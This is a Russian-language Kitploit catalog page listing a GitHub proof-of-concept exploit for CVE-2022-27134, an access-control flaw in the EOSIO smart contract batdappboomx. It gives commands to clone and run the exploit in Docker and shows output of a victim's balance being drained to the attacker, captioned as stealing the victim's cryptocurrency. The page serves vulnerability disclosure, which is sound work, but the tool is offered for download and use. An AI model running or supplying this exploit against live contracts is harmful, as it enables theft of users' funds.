Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-batdappboomx — CVE-2022-27134 | Kitploit
Инструменты/GitHubGitHub/kenun99/cve-batdappboomx
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubkenun99/cve-batdappboomx

CVE-batdappboomx

CVE-2022-27134

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE ID

CVE-2022-27134

ПРОДУКТ

batdappboomx — это публичный смарт-контракт, работающий в блокчейне EOSIO. Этот смарт-контракт вознаграждает своих участников криптовалютой, если они предварительно заплатят некоторую криптовалюту.

Версия

Последняя версия этого смарт-контракта. Хэш-код sha256 смарт-контракта: 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820. Проверьте его в обозревателе блокчейна по адресу https://bloks.io/account/batdappboomx.

ТИП ПРОБЛЕМЫ

уязвимость контроля доступа

ОПИСАНИЕ

batdappboomx не является открытым исходным кодом, но мы нашли уязвимость с помощью WASAI. Злоумышленники могут присоединиться к этой игре, ничего не платя.

  1. активируйте окружение
root@kitploit:~
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm  --network host -it localhost/client-eos:eos
  1. атакуйте жертву и украдите её криптовалюту, т.е. EOS
root@kitploit:~
info  2022-03-11T14:28:53.345 keosd     wallet_plugin.cpp:38          plugin_initialize    ]
...
warn  2022-03-11T14:28:53.355 keosd     wallet.cpp:218                save_wallet_file     ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00

[+] Attacked successfully. Got more cryptocurrency.
Скачать инструмент